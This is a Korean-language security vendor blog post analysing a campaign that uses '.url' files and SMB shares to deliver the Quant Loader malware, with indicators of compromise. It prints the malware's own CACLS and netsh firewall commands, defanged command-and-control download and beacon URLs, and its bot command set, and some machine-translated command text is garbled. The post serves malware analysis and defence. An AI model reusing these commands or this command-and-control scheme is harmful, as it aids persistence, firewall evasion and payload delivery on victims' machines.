• 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite 블로그
영업팀에 문의
  • 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
홈  /  서버용 바이러스 백신  / 새롭게 등장하는 ".url" 맬웨어 캠페인에 대한 심층 분석
새롭게 등장하는 ".url" 맬웨어 캠페인에 대한 심층 분석
19 3월 2018

새롭게 등장하는 ".url" 맬웨어 캠페인에 대한 심층 분석

Written by 프라딥 쿨카르니
프라딥 쿨카르니
서버용 바이러스 백신
5
공유

지난주에 우리는 새로운 것의 등장에 대해 블로그에 올렸습니다. 공격 벡터 '.url' 맬웨어 유포에 사용됩니다. 이 블로그 게시물에서는 이 '.url' 벡터의 공격 체인을 자세히 살펴보고, 이를 적극적으로 악용하는 Quant Loader 맬웨어에 대해 자세히 알아보겠습니다.

이 공격에서 관찰된 실행 순서를 보여주는 아래 공격 체인을 살펴보겠습니다. 여기서는 ".url" 파일을 사용하여 맬웨어를 퍼뜨리고 있습니다.

그림 1. 공격 체인
그림 1. 공격 체인

다음은 공격 체인의 프로세스 요약을 나타낸 그림입니다.

그림 2. 프로세스 요약
그림 2. 프로세스 요약

위에서 설명한 대로 일반적으로 ".url"에는 URL("https://" 또는 "https://")이 포함되지만, 이 경우에는 악성 JavaScript를 실행하기 위해 SMB 공유에 액세스하는 것이 관찰되었습니다.

그림 3. SMB 공유에 접근하는 URL 파일
그림 3. SMB 공유에 접근하는 URL 파일

위 파일은 CVE-2016-3353과 관련이 있습니다. 이 취약점은 Internet Explorer가 인터넷 영역의 '.url' 파일을 잘못 처리하여 원격 공격자가 조작된 파일을 통해 의도된 액세스 제한을 우회할 수 있도록 합니다.

이러한 SMB 공유는 공개적으로 접근 가능하며 인증 없이도 접근할 수 있습니다. 그림 3과 4는 악성 JavaScript 파일이 저장된 공개 SMB 공유 위치 "buyviagraoverthecounterusabb[.]net/documents/"를 보여줍니다. 악성 SMB 공유 위치의 IP 주소는 "91.102.153.90"입니다.

그림 4. SMB가 액세스를 공유하는 동안 통신 캡처
그림 4. SMB가 액세스를 공유하는 동안 통신 캡처
그림 5. 공개적으로 저장된 JavaScript 파일
그림 5. 공개적으로 저장된 JavaScript 파일

다음 그림은 SMB 프로토콜을 통해 피해자에게 악성 JavaScript가 전달되는 모습을 보여줍니다.

그림 6. SMB 요청
그림 6. SMB 요청

악성 JavaScript를 열면 'wscript.exe' 애플리케이션이 실행됩니다.

그림 7. 사용자 프롬프트
그림 7. 사용자 프롬프트

그림 5에서 볼 수 있듯이 피해자가 '열기'를 클릭하면 악성 JavaScript에 의해 두 번째 단계 맬웨어가 다운로드됩니다. 이 악성 JavaScript는 매우 난독화되어 있으며 첫 번째 단계 다운로더로만 사용됩니다.

그림 8. 악성 JavaScript 다운로더
그림 8. 악성 JavaScript 다운로더

두 번째 단계의 악성코드는 JavaScript를 통해 '%TEMP%' 위치에 다운로드되고 'cmd.exe'를 통해 생성됩니다. 이 악성코드는 난독화된 실행 파일로, 메모리에서 직접 실행됩니다. 이 악성코드는 '퀀트 로더'이며 다른 악성코드를 다운로드하는 데 사용될 수 있습니다. Quick Heal Security Labs의 분석 당시 Quant Loader가 다운로드한 악성코드는 발견되지 않았습니다. Quant Loader 악성코드의 작동 방식을 살펴보겠습니다.

Quant Loader 맬웨어는 "Keyboard Layout\Preload"를 통해 시스템의 모든 키보드 로캘을 확인합니다. 로캘이 러시아어, 우크라이나어, 카자흐스탄어 중 하나라도 해당되면 종료됩니다.

그림 9. 시스템 로케일 확인
그림 9. 시스템 로케일 확인

Quant Loader는 다음 레지스트리 키를 사용하여 피해자 시스템의 32/64비트 구성을 식별합니다. 그런 다음 CNC 서버와 통신하는 동안 CNC 요청의 일부로 동일한 정보를 사용합니다.

HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir(x86)

또한 다음 레지스트리 항목이 있는지 확인합니다.

그림 10. 다양한 보안 제품의 존재 여부 확인
그림 10. 다양한 보안 제품의 존재 여부 확인

'dwm.exe'라는 이름의 자체 복사본을 '에 놓습니다. \<8DigitNumeric>' 폴더에 저장하고 레지스트리의 "실행" 항목을 통해 자동 실행되도록 설정합니다. 이는 시스템 내 지속성을 확보하기 위한 조치입니다.

그림 11. 악성코드 파일의 자체 복사본
그림 11. 악성코드 파일의 자체 복사본

이 8자리 숫자는 CNC 서버와 통신할 때 봇 ID(BotId)로 사용됩니다. BotId는 다음 단계를 거쳐 생성됩니다.

  1. 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid'를 읽어보세요.
  2. Machine ID 값에서 발생하는 순서대로 숫자만 추출합니다.
  3. 처음 5자리 숫자를 생략하고 8자리부터 5자리 숫자를 고려합니다.
그림 12. BotId로 MachineGuid 사용
그림 12. BotId로 MachineGuid 사용

그런 다음 로그인한 사용자의 8자리 폴더와 'dwm.exe' 파일에 대한 사용자 접근 권한을 읽기 모드로 변경합니다. 이렇게 하면 사용자는 폴더와 'dwm.exe'를 삭제하거나 수정할 수 없습니다. 이는 다음 명령을 통해 정품 CACLS Windows 파일을 사용하여 수행됩니다.

cmd /c echo Y|CACLS “c:\users\ \appdata\roaming\48378942\dwm.exe” /P “ :아르 자형"

 그런 다음 Quant Loader는 "Quant"라는 이름의 아래 규칙을 방화벽에 추가합니다. 이를 통해 맬웨어는 방화벽 규칙을 우회하여 인터넷에서 통신할 수 있습니다.

netsh advfirewall 방화벽 규칙 이름="Quant" 프로그램="c:\users\ 추가 \appdata\roaming\48378942\dwm.exe” dir=Out action=allow

또한 CNC 도메인 'wassronledorhad[.]in'에 연결하여 다른 악성 파일을 다운로드하려고 시도합니다.

분석이 수행될 당시 CNC는 응답하지 않았습니다. 그러나 정적 분석을 통해 Quant Loader의 CNC 통신 및 기타 기능에 대한 몇 가지 통찰력을 얻을 수 있습니다.

CNC 서버가 활성화되어 있었다면 아래 파일이 다운로드되었을 것입니다.

hxxp://wassronledorhad.in/q2/lib/zs.dll.c
hxxp://wassronledorhad.in/q2/lib/bs.dll.c
hxxp://wassronledorhad.in/q2/lib/sql.dll.c

이러한 파일은 각각 zs.dll, bs.dll, sqlite3.dll이라는 이름으로 %APPDATA%\z 폴더에 저장됩니다.

그림 13. 다운로드 파일 이름
그림 13. 다운로드 파일 이름

'zs.dll'과 'sqlite3.dll'의 파일 크기가 0x20000 미만인지 확인합니다. 그런 다음 zs.dll의 "Main" 함수를 실행합니다.

그림 14. 다운로드한 DLL을 로드하고 실행합니다.
그림 14. 다운로드한 DLL을 로드하고 실행합니다.

Quant Loader는 다음 요청을 CNC 서버로 보내려고 했습니다.

hxxp://wassronledorhad[.]in/q2/index.php?id=48378942&c=2&mk=75490e&il=H&vr=1.73&bt=32

여기서 id = BotId, c = 요청 카운터, bt = 32/64비트 시스템입니다.

다음과 같은 구조를 가진 CNC 서버의 명령을 기다립니다.

[봇ID][명령][데이터]

명령은 "pwd", "exe", "doc", "dll" 중 하나일 수 있습니다.

그림 15. 봇 명령어 목록
그림 15. 봇 명령어 목록

"pwd" 명령은 "Main" 함수와 함께 zs.dll을 실행하는 것으로도 밝혀졌습니다.

나머지 명령의 경우, 맬웨어는 'temp' 폴더에 windows timestamp라는 이름의 파일을 생성합니다.

그림 16. 시스템 시간을 사용하여 파일 이름을 만드는 방법
그림 16. 시스템 시간을 사용하여 파일 이름을 만드는 방법

명령이 "exe"이면 ShellExecute API를 사용하여 파일을 실행합니다.

그림 17. 다운로드한 exe 파일을 실행하기 위한 ShellExecute 호출
그림 17. 다운로드한 exe 파일을 실행하기 위한 ShellExecute 호출

명령이 "doc"이면 WinExec API를 사용하여 파일을 실행합니다.

그림 18. 다운로드한 doc 파일을 실행하기 위한 WinExec 호출
그림 18. 다운로드한 doc 파일을 실행하기 위한 WinExec 호출

명령이 "dll"이면 그림 13에서 볼 수 있듯이 "LoadLibrary"와 "GetProcaddress"를 사용하여 dll에서 원하는 함수를 실행합니다.

따라서 명령에 따라 봇은 다른 악성 파일을 다운로드하여 실행할 수 있습니다.

현재 Quant Loader에서 '.Url' 공격 벡터를 사용하고 있습니다. 앞으로 다른 악성코드 계열에서도 이 초보 공격 벡터(.url)를 사용하는 사례가 증가할 것으로 예상됩니다.

손상의 지표:

50C359167CC74A962CACAFF2A795B23C
4394536E9A53B94A2634C68043E76EF8
buyviagraboverthecounterusabb[.]net/documents/B200795218387[.]js
91.102.153.90

주제별 전문가

  • Pradeep Kulkarni, Amar Patil, Aniruddha Dolas | Quick Heal 보안 연구소

 이전 포스트네트워크 보안 솔루션에 꼭 필요한 5가지 기능
다음 포스트  사이버 보안을 우선시하는 것: 어디서부터 시작해야 할까?
프라딥 쿨카르니

Pradeep Kulkarni 소개

프라딥 쿨카니는 Quick Heal Technologies Limited의 IPS 팀을 이끌고 있습니다. 그는 11년 이상 IT 보안 업계에서 근무하며 다양한...

Pradeep Kulkarni의 기사 »

관련 게시물

  • 서버용 바이러스 백신: 복잡한 네트워크를 위한 종합 솔루션

    2018 년 4 월 2 일
  • 회사의 서버와 네트워크가 보안되어야 하는 이유는 무엇입니까?

    2017 년 7 월 18 일
추천 작가
  • 시크라이트
    시크라이트

    Seqrite는 선도적인 기업용 사이버 보안 솔루션 제공업체입니다.

    더 읽기 ..
  • 조티 칼레카르
    조티 칼레카르

    저는 새로운 기술과 관련된 콘텐츠를 만드는 것을 좋아하는 열렬한 작가입니다.

    더 읽기 ..
  • 비니쉬 P
    비니쉬 P

    저는 열정적인 사이버 보안 애호가이자 헌신적인 작가입니다. 재능을 가진...

    더 읽기 ..
  • 산제이 카트카르
    산제이 카트카르

    산제이 카트카르는 Quick Heal Technologies의 공동 전무이사입니다.

    더 읽기 ..
이상의 주제
적절한 (25) 사이버 공격 (36) 사이버 공격 (58) 사이버 공격 (16) 사이버 공격 (15) 사이버 보안 (335) 사이버 보안 (34) 사이버 위협 (33) 사이버 위협 (50) 데이터 위반 (56) 데이터 유출 (29) 데이터 손실 (28) 데이터 손실 방지 (34) 데이터 프라이버시 (15) 데이터 보호 (32) 데이터 보안 (17) DLP (50) DPDP (14) 디피디파 (16) 암호화 (16) 엔드 포인트 보안 (110) 엔터프라이즈 보안 (18) 공적 (13) GDPR (13) 악성 코드 (76) 악성 코드 분석 (13) 악성 코드 공격 (23) 맬웨어 공격 (12) MDM (27) Microsoft (15) 네트워크 보안 (24) 패치 관리 (12) 피싱 (29) 랜섬 (69) 중매 공격 (30) ransomware 공격 (30) 중매 보호 (14) 시크라이트 (41) Seqrite 암호화 (27) 시크라이트 EPS (33) Seqrite 서비스 (16) 그래프 기반 사이버 위협 인텔리전스 (13) UTM (34) 보안 문제 (16) 제로 트러스트 (13)
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite

전 세계적으로 최고 수준의 위협 예방, 탐지 및 대응 솔루션을 제공하여 엔드포인트, 데이터 및 네트워크 보안을 간소화하는 선도적인 기업 IT 보안 솔루션 제공업체입니다.

자세히 보기

우리를 따르십시오 :

우리의 뉴스 레터를 구독

최신 사이버보안 동향과 통찰력을 알아보세요.

로딩중
제품 & 서비스
  • 클라우드
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 모바일 장치 관리
  • BYOD
  • 확장 된 탐지 및 대응
  • 제로 트러스트 네트워크 액세스
  • 데이터 개인 정보
  • 온프레미스
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 데이터 개인 정보
  • 플랫폼
  • 악성코드 분석 플랫폼
  • 마이크로 비즈니스
  • SOHO 토탈 에디션
  • 서비스
  • 위협 인텔
  • 디지털 위험 보호 서비스(DRPS)
  • 랜섬웨어 복구 서비스(RRaaS)
  • DPDP 준수
  • 관리되는 탐지 및 대응
자료
  • 블로그
  • 백서
  • 데이터시트
  • 위협 보고서
  • 매뉴얼
  • POV
  • 데이터 개인 정보 보호 이해
  • DPDP 대화
  • 정책 및 규정 준수
  • EULA
  • 고딥.AI
  • SIA
문의하기
  • 등록 사무소
  • 가장 가까운 사무실
  • 사이버 보안에 대해 이야기해 봅시다
고객 지원
  • 기술 지원
  • 소프트웨어 다운로드
  • 오프라인 업데이터
  • 펌웨어 업그레이드
  • 업그레이드
  • 제품 설명서
브랜드 소개
  • Seqrite 소개
  • Leadership
  • 어워드 수상
  • 뉴스 편집실
되어보세요
  • 파트너 프로그램
  • 파트너 찾기
  • 파트너가 되십시오
  • Seqrite 인증

© 2026 퀵힐테크놀로지스 주식회사

사이트 맵 개인 정보 보호 정책 법적 고지 쿠키 정책 이용 약관